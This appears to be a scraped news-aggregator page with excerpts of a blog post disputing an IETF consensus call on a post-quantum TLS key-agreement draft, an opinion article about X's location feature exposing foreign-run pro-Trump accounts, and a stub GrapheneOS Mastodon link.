As noted above, IESG had instructed the “area director” to answer the following question: “Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?”

Side note: Given that the “area director” posted all of the following on the same day that IESG instructed the “area director” to write this, presumably this was all written in advance and coordinated with the rest of IESG. I guess the real point of finally (on 1 November 2025) addressing the adoption decision (from 15 April 2025) was to try to provide cover for the “last call” a few days later (5 November 2025).

I agree with the TLS WG Chairs that the Adoption Call re­sult was that there was rough con­sen­sus to adopt the doc­u­ment.

As noted above, the TLS WG chairs had claimed “consensus”, and the “area director” had claimed that there was “clearly consensus”. The “area director” is now quietly shifting to a weaker claim.

...

Read the original on blog.cr.yp.to »

9 297 shares, 13 trendiness

X Just Accidentally Exposed A Vast Covert Influence Network Targeting Americans

A new feature on X has revealed that a huge number of large, divisive political accounts claiming to be Trump supporters are actually operating out of foreign countries. The discovery — likely the most sweeping public exposure of covert foreign activity on a major platform since the revelations about Russia in 2016 — raises serious concerns about covert foreign influence in U.S. political discourse, mirroring the Russian disinformation campaign in which operatives from Russia’s Internet Research Agency posed as U.S. persons to interfere in the election.

The new fea­ture on X al­lows users to see the ap­prox­i­mate place where an ac­count was cre­ated and is pri­mar­ily op­er­at­ing from, rather than hav­ing to rely solely on an ac­count op­er­a­tor’s self-re­ported lo­ca­tion. The move was made to boost trans­parency and en­hance the au­then­tic­ity of dis­cus­sions on the plat­form, but it im­me­di­ately be­came ap­par­ent that the new fea­ture would have an ad­di­tional ef­fect: ex­pos­ing for­eign ac­counts that are pos­ing as Americans.

On Saturday, X users found scores of pro-Trump and MAGA accounts that were trying to pass as Americans but were operated from countries in Europe, Asia, Africa, and elsewhere. X acknowledges that some of the operating locations may actually be the location of a VPN service rather than the location of the account owner, but the sheer number of accounts operating from outside of the United States makes it clear that not all of these are simply proxy locations. Furthermore, some of these accounts had listed their locations as being within the U.S., and some were operating with usernames such as (@)American despite being operated from overseas. As X Product Chief Nikita Bier explained, “if an account claims to be from a U.S. location but the data shows it’s based overseas, that discrepancy is a red flag suggesting the account might have another agenda.”

While location-based discrepancies were found among all types of accounts, the most noticeable and largest group of accounts revealed to be operating from overseas were those purporting to be Trump fans, many of whom described themselves as “Patriots” who champion “America First” politics. For instance, a prominent account called MAGA NATION (with 392,000+ followers) turned out to be posting from Eastern Europe, not America. Other examples include Dark MAGA (15,000 followers, based in Thailand), “MAGA Scope” (51,000 followers, based in Nigeria), and an “America First” account (67,000 followers) run from Bangladesh. Other large political, crypto, and even public health influencer accounts claiming U.S. roots — many of which are also MAGA-aligned — are similarly being outed with locations traced to countries like India, Nigeria, and elsewhere. In each case, an account that gave every impression of being an American political participant — complaining about gas prices or vaccine mandates, cheering or mocking candidates, reacting to debates, and posting memes about things like the border or inflation — was run by someone who isn’t even in America.

The exposure of foreign-run political accounts on X immediately calls to mind covert influence operations of the past — most notably, Russia’s meddling in the 2016 U.S. election. In 2016, Russia’s Internet Research Agency (IRA) infamously created countless fake social media personas impersonating Americans to sow discord, denigrate Hillary Clinton, and boost Trump’s candidacy. According to the Mueller investigation’s conclusions and U.S. intelligence findings, these operatives “posed as U.S. persons…operated social media pages and groups designed to attract U.S. audiences…[and] falsely claimed to be controlled by U.S. activists when, in fact, they were controlled by [foreign actors].” Their strategy included using stolen identities and pretending to be grassroots American voices, all to infiltrate online communities and influence political opinion. By mid-2016 the IRA’s campaign explicitly focused on boosting Trump and disparaging Hillary Clinton, under orders from the Kremlin.

The pattern now emerging on X suggests history may be repeating itself, albeit likely with new actors and technologies. Or perhaps even more likely, these types of tactics never actually stopped in the first place. Covert foreign influence via social media remained a live threat in the run-up to the 2024 presidential election. In fact, investigative reporting by CNN in 2024 uncovered a campaign on X aimed at bolstering Trump’s candidacy — a network of at least 60 fake pro-Trump accounts using profile photos stolen from real women in Europe. These fake personas, posing as enthusiastic American Trump supporters, told U.S. voters to “vote for Trump in 2024” while the actual women depicted (from countries like Denmark, the Netherlands, and even Russia) had no idea their images were being misused.

The geographic spread of the exposed accounts hints at a variety of possible culprits and motives. Some accounts originate in countries historically linked to disinformation targeting the U.S. (e.g. Russia or Eastern European locales) while others come from places like Nigeria, India, Thailand, or Kenya with no obvious state sponsor. This suggests we could be seeing multiple layers of foreign influence: both state-sponsored influence operations (Russia and others) trying to sway U.S. politics, as well as a cottage industry of opportunists and trolls for hire globally who exploit U.S. political tribalism for clout or profit. In 2016, for example, not only did Russian agents interfere, but so did independent foreign scammers — notably the notorious Macedonian “fake news farms” where teenagers churned out pro-Trump disinformation simply because it drew huge web traffic and ad revenue. Today’s foreign MAGA accounts could likewise be profit-driven grifters — people pretending to be patriotic Americans while actually just racking up followers and perhaps soliciting donations or earning X’s ad-share payouts from viral content.

The discovery that a significant number of political accounts — especially in the pro-Trump/MAGA sphere — are operated from abroad carries far-reaching implications. It validates warnings that covert foreign influence on social media did not end with 2016, but is an ongoing challenge to U.S. democracy and societal cohesion. The immediate impact is a jolt of awareness: both the public and policymakers can now see concrete examples of how outsiders try to shape American political conversations from afar. This awareness, thanks to X’s transparency feature, is a double-edged sword. On the one hand, it empowers users and authorities to identify and possibly neutralize foreign propaganda by calling it out and removing its mask of authenticity. On the other hand, it injects a new layer of skepticism and accusation into political discourse — people may reflexively dismiss opposing views as just “foreign bots,” and genuine activists might find themselves under suspicion if their location isn’t easily verified.

Moving for­ward, we’ll likely see a re-ex­am­i­na­tion of how much cre­dence we give to so­cial me­dia as a barom­e­ter of pub­lic opin­ion. Lawmakers, cam­paign­ers, and jour­nal­ists will need to vet on­line trends more care­fully (e.g. check if a trend­ing po­lit­i­cal hash­tag is heav­ily dri­ven by ac­counts from over­seas). The plat­form im­pli­ca­tions for X are sig­nif­i­cant as well: X must de­cide whether it will ac­tively clamp down on these for­eign-run ac­counts or sim­ply in­form users and leave the con­tent up. Its rep­u­ta­tion as a plat­form for healthy po­lit­i­cal di­a­logue is on the line; too much ma­nip­u­la­tion could drive users to al­ter­na­tives or in­vite reg­u­la­tory back­lash.

As for the rest of us, the im­pli­ca­tions are sim­i­lar to those fol­low­ing the 2016 Russian cam­paign: we’re still un­der at­tack and likely have been this whole time.

I’ll re­turn with a more de­tailed analy­sis of these rev­e­la­tions soon, so stay tuned.

...

Read the original on weaponizedspaces.substack.com »

10 276 shares, 9 trendiness

GrapheneOS Mastodon

If you trust this link, click it to con­tinue.

...

Read the original on goingdark.social »
